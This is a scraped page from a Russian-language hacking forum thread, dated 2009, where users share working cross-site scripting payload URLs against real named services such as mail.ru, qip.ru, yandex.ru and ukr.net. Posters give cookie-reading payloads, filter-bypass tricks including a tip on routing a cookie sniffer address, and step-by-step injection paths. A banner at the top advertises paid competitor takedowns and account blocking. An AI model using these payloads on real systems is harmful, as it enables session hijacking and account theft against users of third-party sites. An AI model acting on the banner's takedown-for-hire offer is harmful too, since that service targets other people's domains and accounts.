УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Пассивные xss на почтовых серверах

Страница 9 из 15

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#81

26.10.2009, 17:58

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

Отправить сообщение для satana-fu с помощью ICQ

пассивная xss на qip.ru

работает только у авторизованных

Цитата:

http://file.qip.ru/account/myAccount.jsp?sId="><script>alert(document.cookie) </script>

Цитата:

http://file.qip.ru/account/settings.jsp?sId="><script>alert(document.cookie)</script>

#82

28.10.2009, 18:17

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://www.yandex.ru/?add=3188&'><''>"><script>alert(/XSS/)</script>edit=1#widgetAdded

после выберам " Авто
рассчитай стоимость "

и вылазеет XSS !
Знаю что хрень но все же...

#83

29.10.2009, 04:45

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

пассивка на mаil.ru, работает только у авторизованных

Цитата:

http://hosting.mail.ru/options.jsp?email="><script>alert(document.cookie) </script>

пассивка на mаil.ru, точку в адресе сниффера ставить в урл уникоде, иначе фильтр может заменить точку в урл на нижнее подчеркивание

Цитата:

http://story.travel.mail.ru/?"><script>alert(/xss/)</script>metro_id=4&mod=custom_order_tour&city_from= 1&countryid=51
&countryidtxt=&cityid=-1&cityidtxt=&hotelidtxt=&inp_mode=sel&cat3=on
&cat4=on&cat5=on&price=3000&p_mode=1&p_type=2
&nights1=7&nights2=14&date1_d=1&date1_my=10_200 9&
date2_d=19&date2_my=10_2009&HB=on&STD=on&comments=

Последний раз редактировалось satana-fu; 29.10.2009 в 05:15..

#84

29.10.2009, 21:43

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://berserk.mail.ru/index.php?'%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Eid=239

#85

31.10.2009, 20:25

_Spamer_

Познающий

Регистрация: 03.02.2009

Сообщений: 49

Провел на форуме:
3317712

Репутация: 403

mail.ru
имя: '"/><script>alert("xss");</script>

#86

03.11.2009, 18:14

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://11x11.mail.ru/xml/main/register.php?type=main/register&act=insert в логин вводим '><''>"><script>alert(/Ruslan1817/)</script>

http://11x11.mail.ru/xml/main/send.php?type=main/register&act=sendagain

тоже самое вводим )

Последний раз редактировалось Kusto; 03.11.2009 в 21:36.. Причина: отдел продаж у нас в другом разделе

#87

05.11.2009, 10:52

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

http://email.int.ru/cod/site.php?url=http://mail.live.com&title="><script>alert();</script>

#88

05.11.2009, 16:59

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://tv.ukr.net/rew/g/07112009/bid141/id19229/tmnow/#index.html в поле

http://kino.ukr.net/cinema/kiev/batterfljaj-de-luxe/2#board

Имя*:
E-mail:
Сообщение*: '><''>"><script>alert(document.cookie)</script>

печенюГа))

исправил на латынь !!!

http://pic.ipicture.ru/uploads/091105/ZYDf5AX74W.jpg
____________________________________________

тут есть дырка фильтре, но никак не могу доработать скрипт

Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&R egionId=0

Последний раз редактировалось Kusto; 06.11.2009 в 00:16.. Причина: еще раз повторяю здесь ничего не продают, и насколько я вижу эта активка и не ПОЧТОВОГО сервера

#89

06.11.2009, 16:36

satana-fu

Moderator - Level 7

Регистрация: 06.02.2009

Сообщений: 195

Провел на форуме:
2485155

Репутация: 719

Цитата:

Сообщение от Ruslan1817

тут есть дырка фильтре, но никак не могу доработать скрипт

Кто поможет ?
http://job.ukr.net/resume/?AdvancedSearch=0&ShowSearchResults=1&Keywords=%&R egionId=0

такой вариант годится?

http://job.ukr.net/personal/resume/new/?event=Add&Photo%5Bthmb%5D=&Photo%5Bfull%5D="><img src=foo.png onerror=alert(document.cookie) />&RegionId=0&AgreementConfirm=1

Последний раз редактировалось satana-fu; 07.11.2009 в 03:16..

#90

07.11.2009, 12:45

Ruslan1817

Постоянный

Регистрация: 17.01.2009

Сообщений: 309

Провел на форуме:
2991228

Репутация: 403

http://shop.deti.mail.ru/series/13993/?order=name&'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3Eway=forward
есть контакт )

далее идем -->шаг 1 --> выбераем подарок--> шаг 2--> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 3 -->
Курьер : С.-Петербург --> везде указываем '><''>"><script>alert(document.cookie)</script> --> шаг 4 --> наличными --> жмакаем далее и уау!

Все !

Последний раз редактировалось Ruslan1817; 07.11.2009 в 13:03..

Страница 9 из 15

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Сценарии/CMF/СMS	7	04.02.2010 02:55
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход